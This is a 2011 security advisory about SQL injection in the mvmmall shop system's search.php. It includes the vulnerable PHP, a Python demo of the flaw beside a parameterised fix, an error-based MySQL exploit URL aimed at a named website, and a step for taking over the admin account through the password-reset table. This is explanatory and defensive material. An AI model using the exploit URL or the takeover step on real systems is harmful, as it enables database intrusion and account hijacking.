mvmmall shop mall system injection vulnerability - Vulnerability warning - The Black Bar Safety Net

2011-03-30T00:00:00
ID MYHACK58:62201129905
Type myhack58
Reporter Anonymous
Modified 2011-03-30T00:00:00

Description

The latest injection 0day in the mvmmall shop mall system is in the file search.php: the product tag ids are concatenated unquoted into the search SQL.

The code is as follows:

```php
<?php
require_once 'include/common.inc.php';
require_once ROOTPATH.'header.php';

if($action!='search'){
    $search_key = '';
    if (isset($ps_search)) {
        // ... a bunch of code omitted ...
        $tag_ids = array();   // $tag_ids is only initialised inside this if
        // ... omitted ...
        while ($row = $db->fetch_array($result)) {
            $tag_ids[] = $row['goods_id'];
        }
        // ... still inside the if ...
    }
    // ... omitted ...
}
// ... end of the if ...

// Product tag search
// Without ps_search, $tag_ids is never initialised, so it can be supplied
// entirely by the request (register_globals-style variable import).
$tag_ids = array_unique($tag_ids);
// dhtmlchars only filters HTML tags; it does nothing against SQL
$tag_search = implode(',', dhtmlchars($tag_ids));
// ... and here it is concatenated straight into the query
$tag_search && $tag_search = "OR uid IN($tag_search)";
// ... unrelated code omitted ...
// No single quotes around the tag list, so no quote escaping is needed
$search_sql = "WHERE upv = '1' AND up_date<='$m_now_time'" . " AND (( 1 " . $cat_search . $search_key . $brand_search . $min_search . $max_search . " ) " . $tag_search . " )";
$total_count = $db->counter($mvm_goods_table, $search_sql);
```
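To make the injection point concrete, the following is an added example (not code from mvmmall or from the original advisory) that rebuilds the same WHERE clause in Python over an in-memory SQLite table with constructed sample rows (the goods column names are assumptions, not the real schema). It contrasts the original construction, which only HTML-escapes the tag ids (the dhtmlchars analogue) and concatenates them unquoted into IN(...), with a hardened version that coerces every id to an integer and binds it as a parameter. Because SQLite has no error-based trick comparable to the MySQL payload below, the demonstration payload uses the same `))` structure to break out of IN(...) and the enclosing parenthesis, but then appends a tautology that leaks an unpublished product rather than extracting user().

```python
import html
import re
import sqlite3

# Constructed sample rows standing in for the mvmmall goods table (column
# names are assumptions). upv='1' means listed, '0' means unpublished.
SAMPLE_GOODS = [
    (1, 10, "public-item", "1", "2011-03-01"),
    (2, 11, "hidden-item", "0", "2011-03-01"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE goods (goods_id INTEGER, uid INTEGER, goods_name TEXT,"
        " upv TEXT, up_date TEXT)"
    )
    conn.executemany("INSERT INTO goods VALUES (?,?,?,?,?)", SAMPLE_GOODS)
    return conn


def vulnerable_where(tag_ids, now="2011-03-30"):
    """Rebuilds the WHERE clause the way search.php does: the tag ids are only
    HTML-escaped (dhtmlchars analogue), comma-joined and dropped unquoted into
    IN(...). When ps_search is absent the caller controls tag_ids entirely."""
    tag_search = ",".join(html.escape(str(t)) for t in tag_ids)
    if tag_search:
        tag_search = f"OR uid IN({tag_search})"
    return f"WHERE upv = '1' AND up_date<='{now}' AND (( 1 ) {tag_search} )"


def php_intval(value):
    """Rough analogue of PHP intval(): leading optional sign and digits, else 0."""
    m = re.match(r"\s*([+-]?\d+)", str(value))
    return int(m.group(1)) if m else 0


def hardened_where(tag_ids, now="2011-03-30"):
    """Fix: every tag id is coerced to an integer (array_map('intval', ...) in
    PHP terms) and bound as a query parameter instead of being concatenated.
    Returns (sql, params)."""
    ids = [php_intval(t) for t in tag_ids]
    params = [now]
    tag_search = ""
    if ids:
        tag_search = "OR uid IN(" + ",".join("?" * len(ids)) + ")"
        params.extend(ids)
    return f"WHERE upv = '1' AND up_date<=? AND (( 1 ) {tag_search} )", params


def run_search(conn, where_sql, params=()):
    rows = conn.execute(f"SELECT goods_name FROM goods {where_sql}", params)
    return [r[0] for r in rows]


# Same shape as the advisory's payload: '))' closes IN( and the surrounding
# parenthesis, a top-level condition is appended, and the rest of the query
# is commented out (SQLite uses -- where the MySQL payload uses #).
PAYLOAD = "0)) OR 1=1 --"


def demo():
    """Returns (benign result, result under injection, result after the fix)."""
    conn = make_db()
    benign = run_search(conn, vulnerable_where(["10"]))
    leaked = run_search(conn, vulnerable_where([PAYLOAD]))
    sql, params = hardened_where([PAYLOAD])
    fixed = run_search(conn, sql, params)
    return benign, leaked, fixed


if __name__ == "__main__":
    print(demo())
```

The benign query returns only the listed product; the injected query leaks the unpublished one, because the OR 1=1 lands outside the parenthesised tag condition and overrides the upv = '1' filter; after intval() plus parameter binding the same payload collapses to uid IN(0) and the filter holds. Rejecting any tag id that is not purely digits is stricter than the intval() coercion shown here.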

Once the ADMIN user (and the MALL data) has been obtained, use the retrieve-password function: the mvm_lostpass table stores the validation string, so the password can be changed directly.

Test EXP (the classic MySQL duplicate-key error injection: floor(rand(0)*2) combined with GROUP BY makes MySQL raise a "Duplicate entry" error whose message contains the selected value, here user()):

http://www.dj4now.com/search.php?tag_ids[goods_id]=uid))%20and(select%201%20from(select%20count(*),concat((select%20(select%20user())%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23

BY: http://www.dj4now.com/